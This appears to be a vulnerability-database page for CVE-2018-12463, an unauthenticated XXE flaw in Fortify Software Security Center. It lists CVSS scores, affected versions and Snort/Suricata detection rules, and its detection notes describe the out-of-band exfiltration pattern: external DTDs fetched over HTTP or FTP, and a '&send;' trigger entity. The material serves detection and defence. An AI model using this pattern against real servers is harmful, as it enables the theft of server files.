CVE-2018-12463
published 2018-07-12CVE-2018-12463: An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read…
PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
13.85%
96.1th percentile
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | fortify_software_security_center | — | — |
| hp | fortify_software_security_center | — | — |
| hp | fortify_software_security_center | — | — |
| micro_focus | fortify_software_security_center | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:""; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025841; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025842; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*ftp\x3a\x2f\x2f/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025843; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; content:"&send|3b|"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025844; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
- →Target the unauthenticated SOAP endpoint POST /ssc/fm-ws/services — no credentials are required to exploit this XXE vulnerability. ↗
- →Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over HTTP (SYSTEM "http://...*.dtd") — indicative of OOB-XXE exfiltration attempts. ↗
- →Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over FTP (SYSTEM "ftp://...") — indicative of FTP-based OOB-XXE exfiltration. ↗
- →Look for the XML entity reference &send; in POST bodies to /fm-ws/services, which is the OOB-XXE trigger entity used to exfiltrate data to an attacker-controlled server.
- →The exploit sets Content-Type to 'text/xml; charset=UTF-8; text/html;' and SOAPAction: "" — anomalous Content-Type concatenation can be used as an additional detection signal. ↗
- ·The vulnerability affects only specific versions of Fortify SSC; confirm the deployed version before applying detections to avoid false positives on patched instances. ↗
- ·The Snort/ET rules use PCRE on the HTTP request body; ensure your IDS/IPS is configured to inspect full request bodies (not just headers) for the /fm-ws/services URI path.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.3HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1
suricata·2018-07-16
CVE-2018-12463 ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:""; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025841; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
Suricata
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2
suricata·2018-07-16
CVE-2018-12463 ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025842; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
Suricata
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3
suricata·2018-07-16
CVE-2018-12463 ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*ftp\x3a\x2f\x2f/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025843; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
Suricata
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4
suricata·2018-07-16
CVE-2018-12463 ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4
ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; content:"&send|3b|"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025844; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
No writeups or analysis indexed.
http://www.securitytracker.com/id/1041286https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563https://www.exploit-db.com/exploits/45027/http://www.securitytracker.com/id/1041286https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563https://www.exploit-db.com/exploits/45027/
2018-07-12
Published